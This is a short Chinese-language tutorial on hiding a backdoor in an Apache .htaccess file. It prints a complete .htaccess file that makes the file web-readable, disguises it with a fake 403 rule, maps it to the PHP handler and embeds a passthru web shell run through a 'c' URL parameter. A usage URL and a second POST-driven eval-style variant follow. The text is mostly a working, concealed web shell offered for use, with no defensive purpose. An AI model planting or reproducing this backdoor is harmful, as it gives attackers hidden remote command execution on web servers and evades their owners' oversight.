用.htaccess做更隐蔽的后门
.htaccess内容如下
#首先允许web访问这个文件 <Files ~ "^\.ht"> Order allow,deny Allow from all </Files> RedirectMatch 403 .htaccess$ #.htaccess结尾的403错误,这里是为了增加隐蔽性 AddType application/x-httpd-php .htaccess #给.htaccess映射php拓展 ### SHELL ### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>### KINDLE ### #恶意的php代码
使用方法:http://localhost/.htaccess/?c=dir
例子:
<Files ~ "^\.ht"> Order allow,deny allow from all </Files> AddType application/x-httpd-php .htaccess #<?php $_POST['id']($_POST['image']);?>
相关内容:
IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结